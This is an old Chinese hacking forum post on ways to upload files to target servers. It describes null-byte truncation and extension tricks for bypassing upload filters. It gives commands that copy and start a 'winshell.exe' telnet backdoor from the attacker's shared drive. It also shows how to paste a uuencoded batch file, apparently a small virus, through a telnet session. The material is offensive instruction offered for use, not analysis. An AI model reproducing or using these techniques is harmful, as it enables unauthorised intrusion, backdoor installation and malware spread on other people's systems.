文件上傳技巧
文件上傳是很早以前的事了,最早那會常用的就是IPC連接,然後一個一個的COPY,自從動網upfile漏洞出來以後,各種腳本系統如 PHP.JSP下的文件漏洞紛紛暴出,原理都是大同小異,沒有過濾文件上傳路徑,導致可以抓包然後把空格20改成00,變成空字符NULL,系統是從右往左識別的,所以到空字符那就截斷了,更簡單的就是過濾文件上傳類型不完整,改後綴就可以解決了,這些上傳文件的漏洞,用萬能上傳工具就可以輕鬆搞定,不過漏洞文件名不同罷了。還有一些另類的文件上傳方法,是在系統做了比較好的防範下完成的,資料來源感謝CD-LION提供一。
先COPY個winshell.exe吧,開個telnet端口,命令行下總比在瀏覽器裡方便啊.
copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 已複製一個文件
啟動它 d:\downloads\winzip32\winshell.exe 瀏覽器窗口會停好久,
不用等的,程序已經啟動了,點停止,接著,
斷開共享連接: net use \\myIP\c$ /del 完成
1利用telnet上傳文件 by :jiangyf@usa.net
如果ftp被關了,sendmail也不行,如何把編譯好的文件上傳到主機呢?
方法很簡單:
1.先把要上傳的文件用uuedcode進行編碼,文件會變成大概下面的樣子:
begin 644 file.bat
M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT4%]J
M95@T85!9+7@M04%28#!@*CTP,』500D])04%!049+04]"4$E$34-"04Q%04I-
M3D-"2D%,24%!14U-3D-"1D5』24=&0T%%3D="1T1(0T=02$=』2DA#2$9(1$-!
M1TI(1$-!1T1』4$=.1TI'3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@
M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O
E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@``
`
end
sum -r/size 17903/262
全部都是可見的ASCII字符了
[b]2.用TELNET連接到主機後輸入[/b]
$ cat >a
然後用WINODWS的拷貝/粘貼,把文件粘貼到telnet窗口
按^d
在當前目錄下產生文件a
頁:
[1]